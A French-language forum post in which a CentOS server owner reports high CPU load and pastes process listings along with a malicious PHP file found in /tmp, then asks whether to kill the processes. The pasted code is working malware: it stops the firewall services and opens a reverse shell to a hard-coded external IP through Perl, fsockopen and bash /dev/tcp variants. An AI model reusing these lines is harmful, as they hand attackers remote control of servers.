Bonjour à tous.
J'ai un serveur Linux CentOS dont j'ai remarqué que l'utilisation de l'UC est très élevée depuis quelques jours.
En faisant un ps auxf j'ai trouvé ça :
root 14197 0.0 0.0 10792 1080 ? S Aug22 0:00 sh -c /usr/bin/php -d safe_mode=0 -f /tmp/http.php && /bin/rpm -e psa-locale-ZP-fr-2-1 --nodeps
root 14198 0.0 0.2 156644 7932 ? S Aug22 0:00 \_ /usr/bin/php -d safe_mode=0 -f /tmp/http.php
root 14323 0.0 0.0 10928 1348 ? S Aug22 0:00 \_ /bin/sh -i
root 17808 68.0 0.0 10796 1196 ? R Aug22 4518:36 \_ sh
Et dans le fichier /tmp/http.php indiqué :
Je ne sais pas trop quoi faire. Est-ce que je peux tuer le process sh, ou au moins un des parents?
Ou bien modifier le fichier php et le réexecuter?
Merci d'avance pour vos conseils
J'ai un serveur Linux CentOS dont j'ai remarqué que l'utilisation de l'UC est très élevée depuis quelques jours.
En faisant un ps auxf j'ai trouvé ça :
root 14197 0.0 0.0 10792 1080 ? S Aug22 0:00 sh -c /usr/bin/php -d safe_mode=0 -f /tmp/http.php && /bin/rpm -e psa-locale-ZP-fr-2-1 --nodeps
root 14198 0.0 0.2 156644 7932 ? S Aug22 0:00 \_ /usr/bin/php -d safe_mode=0 -f /tmp/http.php
root 14323 0.0 0.0 10928 1348 ? S Aug22 0:00 \_ /bin/sh -i
root 17808 68.0 0.0 10796 1196 ? R Aug22 4518:36 \_ sh
Et dans le fichier /tmp/http.php indiqué :
<?php
set_time_limit(0);
error_reporting(0);
if(file_exists('/etc/init.d/psa-firewall')){ @exec("/etc/init.d/psa-firewall stop",$out);}
if(file_exists('/etc/init.d/psa-firewall-forward')){ @exec("/etc/init.d/psa-firewall-forward stop",$out);}
if(file_exists('/etc/init.d/iptables')){ @exec("/etc/init.d/iptables stop",$out);}
if(file_exists("/usr/bin/perl")) {
$code='use Socket;$i="54.215.165.144";$p=8081;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';system("/usr/bin/perl -e '$code'");
} else if(function_exists('fsockopen')) {
$sock=fsockopen("54.215.165.144",8081);exec("/bin/sh -i <&3 >&3 2>&3");
} else {
system("/usr/bin/nohup /bin/bash -i >& /dev/tcp/54.215.165.144/8081 0>&1 &");
}
function wr_file_a($fname, $content){
if(strlen($content) == 0) return 0;
$fpp = @fopen($fname, "a+"); if ($fpp) {
@flock($fpp, LOCK_EX); @fwrite($fpp, $content); @flock($fpp, LOCK_UN); @fclose($fpp);
return 1;
}
return 0;
}
Je ne sais pas trop quoi faire. Est-ce que je peux tuer le process sh, ou au moins un des parents?
Ou bien modifier le fichier php et le réexecuter?
Merci d'avance pour vos conseils